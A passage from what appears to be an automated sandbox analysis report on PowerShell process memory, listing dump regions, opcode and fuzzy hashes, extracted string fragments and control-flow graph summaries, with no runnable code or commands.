                                        • Opcode Fuzzy Hash: c6beb9dfe64812935b30b29dc0839a0d2b494eaca4655f988c4ddee67c1d3f05
                                        • Instruction Fuzzy Hash: 6501F73110C3009AE7104A2DCE85F67BF98DF41324F18C53DED485A246C27B9C43D6B1
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9619008ae6780712637df7252b24fc8d68f032c9a35586daa84b5c42041c677
                                        • Instruction ID: 7ab26a9c53dcaa3f3c5516b0d1d7676ea71b5b39cf619444a340e88383dee18f
                                        • Opcode Fuzzy Hash: d9619008ae6780712637df7252b24fc8d68f032c9a35586daa84b5c42041c677
                                        • Instruction Fuzzy Hash: 37F0F9746082404FD7029B38D0547EB7FB1DFC2365F2441AED4059B243CD391807C7A1
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f90094b0ed6d5916af0c476ded8688b202d2b92cbfc515b55617392ec5260f84
                                        • Instruction ID: aa8342801a3425af0438e82ee255b668745f3c08c8e0f34c9beb8d0a90f2467e
                                        • Opcode Fuzzy Hash: f90094b0ed6d5916af0c476ded8688b202d2b92cbfc515b55617392ec5260f84
                                        • Instruction Fuzzy Hash: 50F0F976200604AF97208F0ADD85C63FBADEBD4770719C56AEC4A5B611C672FC42CEA0
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4dd1ae794c6e82791c763f7e0f3436f0c6e952dec4106c6647726a7a33ac077
                                        • Instruction ID: b5fde43347baeebbed5ca6004ef3dff9717d807fcecb9da002050fbbe1caba19
                                        • Opcode Fuzzy Hash: b4dd1ae794c6e82791c763f7e0f3436f0c6e952dec4106c6647726a7a33ac077
                                        • Instruction Fuzzy Hash: C1F03A357092818FC3158B6CD4689A67FF69FCB62175A00EAE084DB362CA21DC01DB54
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$4'^q$4'^q$`Q^q$`Q^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3359492452
                                        • Opcode ID: eb3869e6d92769cafd14e94500960684eef5dd01f293d05f2754418ff07a9e16
                                        • Instruction ID: 7218d53b6ef671f8b48dabfc62b88c122dc31ff85d67aa4c6baf386c306eb176
                                        • Opcode Fuzzy Hash: eb3869e6d92769cafd14e94500960684eef5dd01f293d05f2754418ff07a9e16
                                        • Instruction Fuzzy Hash: BCE1B4B160420ADFDB1D8F69D544B6FBBB6AB86310F18846AE8069B3D1CB31DC85C7D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2306644927
                                        • Opcode ID: 0b3d0ae8027c4a17d2dbd00c16b7eed3890037f4c7312844cd7c56957d0dab48
                                        • Instruction ID: 7234306141ffd2c0e7f78d473f211bec316910e45cc9e8e24b963c0dd5463b71
                                        • Opcode Fuzzy Hash: 0b3d0ae8027c4a17d2dbd00c16b7eed3890037f4c7312844cd7c56957d0dab48
                                        • Instruction Fuzzy Hash: 2E6179B0A1020EDBDB2D8E64C544BAFB7B6BB46311F1580A5E8029B3D0C775DD85CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 559e217d709d6149c5ece6cf79ca358dec36fa128baf2444f234048f4915ebe8
                                        • Instruction ID: 1cf162800486c7e057f883c931ee3c88745731a1777b7cefc3afaa7e26b8c93f
                                        • Opcode Fuzzy Hash: 559e217d709d6149c5ece6cf79ca358dec36fa128baf2444f234048f4915ebe8
                                        • Instruction Fuzzy Hash: D9B18374E012099FCB54DFA9D990A9DFBF2FF88310F208629E419AB355DB31A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: b117c9b49ce80a6668a7aa3ebfd34f1978ab29e6397b082ec8b83218d3e5750d
                                        • Instruction ID: a39df08d6675b9887f6bb753dd10e69b69813b23d1d189678e91677c38f12674
                                        • Opcode Fuzzy Hash: b117c9b49ce80a6668a7aa3ebfd34f1978ab29e6397b082ec8b83218d3e5750d
                                        • Instruction Fuzzy Hash: FAB18374E012099FCB54DFA9D990A9DFBF2FF88310F208629E419AB355DB31A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: 9e76f980157789b1a9342b956c8e0167e54c01602a5d219ad9af761800198f85
                                        • Instruction ID: 75f1f8a3503e50f5d2bd0f6d26a9b29a14e87dc00964251b273eeb6977ded62b
                                        • Opcode Fuzzy Hash: 9e76f980157789b1a9342b956c8e0167e54c01602a5d219ad9af761800198f85
                                        • Instruction Fuzzy Hash: 1201A26174A3964FC32F16385924226AFF22F8391072944D7D042DF3ABCE158D4A83E7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:6.7%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:3
                                        Total number of Limit Nodes:0
                                        Execution graph (rendering omitted): 8195508 -> 819554b (SetThreadToken) -> 8195579
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeffb42de5f8b34e1837ff9ff28bb2e370e96626987598299801c88282daddf9
                                        • Instruction ID: 64400bc330d677435e00a9cf7c482c5dfa23488efb8bd2e60fc7bf0c9fd4f5f6
                                        • Opcode Fuzzy Hash: eeffb42de5f8b34e1837ff9ff28bb2e370e96626987598299801c88282daddf9
                                        • Instruction Fuzzy Hash: 8D917FB1B406155BDB19EFB4C8156AEB7F2EF84704B00892DD50AEB740DF746E0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5833cc656f054ba34aa698bc83f7902c30acbfbce9b6084108096c2d664281ab
                                        • Instruction ID: 1e26b818969925fcf6eead56215a5d4bcf15824a6ad03f33f990f6020b3b590d
                                        • Opcode Fuzzy Hash: 5833cc656f054ba34aa698bc83f7902c30acbfbce9b6084108096c2d664281ab
                                        • Instruction Fuzzy Hash: E3917EB1B406155BDB19EFB4C8156AEB7F2EF84704B00892DD50AEB740DF746E0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at 7021d20, basic blocks numbered 0-155 spanning 7021d20-70223a1; no API or internal calls annotated on any block
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$<-tk$piJk$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-1206889041
                                        • Opcode ID: 86b0c323aaea05ce27a1636ef129f0972fdadbcd81793023ecdc15e2a6b83d99
                                        • Instruction ID: d7fea3bf8377dac36184caefb347d51dcd95f7b1ab15e85fe92d6628dbe5b11a
                                        • Opcode Fuzzy Hash: 86b0c323aaea05ce27a1636ef129f0972fdadbcd81793023ecdc15e2a6b83d99
                                        • Instruction Fuzzy Hash: 76029A737043698FCB658BA8D804A6ABBF5AFC6210F1585ABD515CB352CB32CC46C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$<cuk$piJk$piJk$piJk$piJk$piJk$|,Lk$xl$xl
                                        • API String ID: 0-276384459
                                        • Opcode ID: 32ff7391f9211fdcba72f36d508c0cc470f468c4004240c666ed9e4df65f508e
                                        • Instruction ID: 6a04c50bdf1d48fb311c6a9f14032d03efeaeae1fde91e5eb4f0cbef1497bac4
                                        • Opcode Fuzzy Hash: 32ff7391f9211fdcba72f36d508c0cc470f468c4004240c666ed9e4df65f508e
                                        • Instruction Fuzzy Hash: B3428B72B00226CFCB658BA8C9406ABBBE6BFC5310F15867AE415CB351DB35C846D7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at 8195500, 4 basic blocks (8195500-819559d); block 819554b calls SetThreadToken and branches to 8195579 or 8195580
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1859265854.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_8190000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID: N'
                                        • API String ID: 3254676861-2790810407
                                        • Opcode ID: 06efb5821ee5011d6cc580fe6dd846e6e7541df69cefa6f5879a3059a1ddf920
                                        • Instruction ID: ae0d21a10af481c77f89f92a66617adb81196b9de55e0318758791e51b81e194
                                        • Opcode Fuzzy Hash: 06efb5821ee5011d6cc580fe6dd846e6e7541df69cefa6f5879a3059a1ddf920
                                        • Instruction Fuzzy Hash: F31104B59006488FDB20CF99D584BDEBBF5AF48320F148419D499A7220C779A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at 8195508, 3 basic blocks (8195508-819559d); the entry block calls SetThreadToken and branches to 8195579 or 8195580
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1859265854.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_8190000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID: N'
                                        • API String ID: 3254676861-2790810407
                                        • Opcode ID: 4eb1d8acd15802c7a5e7e23c64db1945a6e5219aa1e11b57d1fff23a55945a79
                                        • Instruction ID: 90c90bd12ac8f8d22b22f821a4bbb69663e2ff527a5e1c5e8ec159bced7e9104
                                        • Opcode Fuzzy Hash: 4eb1d8acd15802c7a5e7e23c64db1945a6e5219aa1e11b57d1fff23a55945a79
                                        • Instruction Fuzzy Hash: FB1113B19002088FDB10DF9AC584BDEFBF9AB48320F14841AD559A7220D774A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at e1cb68, 19 basic blocks (e1cb68-e1cd6e); internal calls to e1c040 (from block e1cc0e) and e1b620 (from block e1ccfa)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 43581080fefc27d066cf28f76123a081948c3bc1dbf9d646894bf8cd5c3725c1
                                        • Instruction ID: 6c4877967b0e83290eb01a531cf7f5a4a9b779bf43703e0162d6f31a3925b3e5
                                        • Opcode Fuzzy Hash: 43581080fefc27d066cf28f76123a081948c3bc1dbf9d646894bf8cd5c3725c1
                                        • Instruction Fuzzy Hash: A561F5B1D002489FDB14DFA9D5446DDFBF1EF88314F24816AE809AB364DB749D85CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at e1cb5a, 19 basic blocks (e1cb5a-e1cd6e), same block structure as the e1cb68 entry; internal calls to e1c040 (from block e1cc0e) and e1b620 (from block e1ccfa)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 69904b95381c13193d3fd8a531fd0d855a542117dbda3afde3d7622c1a99f7e0
                                        • Instruction ID: c14388dd5c9e6ec8a96fb4e4aadbd76c61279ddc85ab3dc4a9d7cf6c1eda0af7
                                        • Opcode Fuzzy Hash: 69904b95381c13193d3fd8a531fd0d855a542117dbda3afde3d7622c1a99f7e0
                                        • Instruction Fuzzy Hash: 665116B0A002089FCB14DFA9D5846DDFBF5EF88314F24816AE809EB364DB749D85CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at e18200, basic blocks e18200-e18363; call site e1822a observed with targets e188b7 and e1889c, call site e18293 observed with targets e1cfc8, e1d018 and e1cfba
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: db8576396532dd51383e18f0daf7c5ebf291ad599c35d0bf9f41348f2a5941fa
                                        • Instruction ID: c3487ce5e0f3d21cfe11159b43c7c9cf8af5c07f3965ac8ffd14b81e3e70a2fd
                                        • Opcode Fuzzy Hash: db8576396532dd51383e18f0daf7c5ebf291ad599c35d0bf9f41348f2a5941fa
                                        • Instruction Fuzzy Hash: 6A412B74B006048FDB19DBA8C554AAEBBF1AF8D715F285099E406BB3A5CA31DC41CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at e1a48f, basic blocks e1a48f-e1a5d9; call site e1a578 observed with targets e1a5f0 and e1a5ef
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 78668cd67ec38e0a67b1000e884598bb0ff33ca36dbf6d046b91c367de493768
                                        • Instruction ID: 782dd2c7ddc2686be36e9ab7bdd6e90c3624cfcb9fe02003223480e0f3f433a7
                                        • Opcode Fuzzy Hash: 78668cd67ec38e0a67b1000e884598bb0ff33ca36dbf6d046b91c367de493768
                                        • Instruction Fuzzy Hash: 7F319CB090A3448BDB60CF6AD0883DAFBF6EF84324F28842DD84DA7245D6745885CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        Control-flow graph (rendering omitted): function at e1a4a0, basic blocks e1a4a0-e1a5d9, same block structure as the e1a48f entry; call site e1a578 observed with targets e1a5f0 and e1a5ef
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 1a774624c2c64a5e66e052d3e4d96fc1f2801033d549a64e37236df5d621d454
                                        • Instruction ID: 4c3ad7d9a626aec8690ceb787cc3da59130e179bc44d94a228e67c6d7280c851
                                        • Opcode Fuzzy Hash: 1a774624c2c64a5e66e052d3e4d96fc1f2801033d549a64e37236df5d621d454
                                        • Instruction Fuzzy Hash: DC217CB09067448FDB60CF6AD0887DAFBF6EB88324F28C02ED95DA7245D67454818B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: a997a4e33dd3e328df7115119a7976124ba0fcd85d00568ed1376a9ed170cbe6
                                        • Instruction ID: dc195ba25ab1c161a8a6a72fcffa5a750b210f0e1e25b271d842765d40d97c14
                                        • Opcode Fuzzy Hash: a997a4e33dd3e328df7115119a7976124ba0fcd85d00568ed1376a9ed170cbe6
                                        • Instruction Fuzzy Hash: 26E020217441640B8B5D617F242016E3AC757C6A50358C0FDE104C7345DC56CC0647E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1d943378b92bf324b2810829d1cc5ea62798728d4b5899674b5f286fc6ee518
                                        • Instruction ID: 394706c041045c56836527e4476006f95e8a3ce81c3a0b8b581be4e2f2a614c4
                                        • Opcode Fuzzy Hash: b1d943378b92bf324b2810829d1cc5ea62798728d4b5899674b5f286fc6ee518
                                        • Instruction Fuzzy Hash: A0124B74A042089FCB15CF98D584AEEBBF2FF88314F258559E855AB365C731ED82CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13051c816d0de3f37876456f0c4085fb0d4afc796cdda9924c7d129ad0f1d772
                                        • Instruction ID: 19efd3ac0e033d47f2c36fcd411e6c193648a36a65e1d7e6327902130d6ccc09
                                        • Opcode Fuzzy Hash: 13051c816d0de3f37876456f0c4085fb0d4afc796cdda9924c7d129ad0f1d772
                                        • Instruction Fuzzy Hash: 6551DF353042019FDB14CB69D944ABABBEAFFC8314B29A56AE409DB352DF31DC418B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b36c0e79cbd3af55736c1ed9f4b326896342f6349a1d50be550e8bc8aa6d0e90
                                        • Instruction ID: c4e3e023a6ac7b081c4ae7dd15cfcdaff5d286c460b54c2b8f56b5198abec9d4
                                        • Opcode Fuzzy Hash: b36c0e79cbd3af55736c1ed9f4b326896342f6349a1d50be550e8bc8aa6d0e90
                                        • Instruction Fuzzy Hash: 1451C634A04209AFDB05CFA8D584ADDBBB2EF48304F248559E815AB365CB71ED86CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 605e9dc3afe3aa01d139aaa614c06f3c8f0d59b86b05fe45bd894fbacb2755b0
                                        • Instruction ID: 682068a2aea86136a8850414a34f2012cbc3ddf723275417692febd9eac8d307
                                        • Opcode Fuzzy Hash: 605e9dc3afe3aa01d139aaa614c06f3c8f0d59b86b05fe45bd894fbacb2755b0
                                        • Instruction Fuzzy Hash: 994117B4A006058FCB09CF58C5989EEFBB1FF48314B158199DA15AB365C736FC91CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cdc19694f323ee28984cc4929c24d821ad10c9415323ab8fc98bfe646f2f1bbe
                                        • Instruction ID: 483e0b24d61a309c476d8df251f16404bf4e5d701487a1b92e6d9a43177e72f6
                                        • Opcode Fuzzy Hash: cdc19694f323ee28984cc4929c24d821ad10c9415323ab8fc98bfe646f2f1bbe
                                        • Instruction Fuzzy Hash: DB4106B4A005059FCB09CF58C5989EEFBB1FF48314B158259DA15AB364C736FCA1CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d4dc7171f7b7368cf96328ac2906af1d0104324153d3fe0501cb6ed7cb2f86e
                                        • Instruction ID: ecf226ccf5d5e853729a76e684979cda2b3cdc388972821632bc89a67983eb92
                                        • Opcode Fuzzy Hash: 6d4dc7171f7b7368cf96328ac2906af1d0104324153d3fe0501cb6ed7cb2f86e
                                        • Instruction Fuzzy Hash: 1C3176713006009FC715EB68E854B9EBB96EFC4324F008539E10ACB365DF74ED898BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33de04506963efe9268f0c6a14b3d13a198f8ab37670f41377b43d8735e33260
                                        • Instruction ID: 54126f0db9b947ef707ecef8a707634764decb2757f517323501e7a3b8114a64
                                        • Opcode Fuzzy Hash: 33de04506963efe9268f0c6a14b3d13a198f8ab37670f41377b43d8735e33260
                                        • Instruction Fuzzy Hash: B5312C34B006058FCB15DB94C558AEABBF1AF8D715F186099E846FB364DB30DC41CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c21ed00ca0f516665a44351addd4124ac809cd2baeae858672a6432fada4e4cf
                                        • Instruction ID: a7e54a8083af0c9c4690d5e3023e1c33d08ce97722fdc74e271734dd808f50cc
                                        • Opcode Fuzzy Hash: c21ed00ca0f516665a44351addd4124ac809cd2baeae858672a6432fada4e4cf
                                        • Instruction Fuzzy Hash: 93314C70A002099FDB04DFB9D8947EEBBF6AF89354F149069E405EB354EB758C858F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0a345e406b55cffe8318d1edb393ccff3a2873cf8bd5392f9c26373817bf634
                                        • Instruction ID: c3687574471cc49947ac1c5170fe979a8d48bb0f911c8c6e5e0ac54fa33a80cf
                                        • Opcode Fuzzy Hash: f0a345e406b55cffe8318d1edb393ccff3a2873cf8bd5392f9c26373817bf634
                                        • Instruction Fuzzy Hash: EF3108B2A04365DFDB90CF98C58076ABBF5BF45310F0682B6E818CB161C335D946DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36e6472f5a2876ca391d21a63b97e9f3352028cbc63ca39dd9c86df464a6374d
                                        • Instruction ID: c31d3cf1fa78213e8d98f41d9fb8b02b7efed8a2df64f725a34a44596ab337a4
                                        • Opcode Fuzzy Hash: 36e6472f5a2876ca391d21a63b97e9f3352028cbc63ca39dd9c86df464a6374d
                                        • Instruction Fuzzy Hash: 09312B74A002099FDB04EF68D455AEEB7B2FF88300F118479E105AB396DB3999468B61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9010cca93dc3f53e5f009042b318d2beccde38ea3444326075284a9eb39164c
                                        • Instruction ID: 86dc4ee1266df3d8947d43508f39706f9849f547182b083c7894a07e00cf9a60
                                        • Opcode Fuzzy Hash: d9010cca93dc3f53e5f009042b318d2beccde38ea3444326075284a9eb39164c
                                        • Instruction Fuzzy Hash: C3313074A002059FDB04EF68D455AFEBBB2FF84300F118479E105EB396DA359E46CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

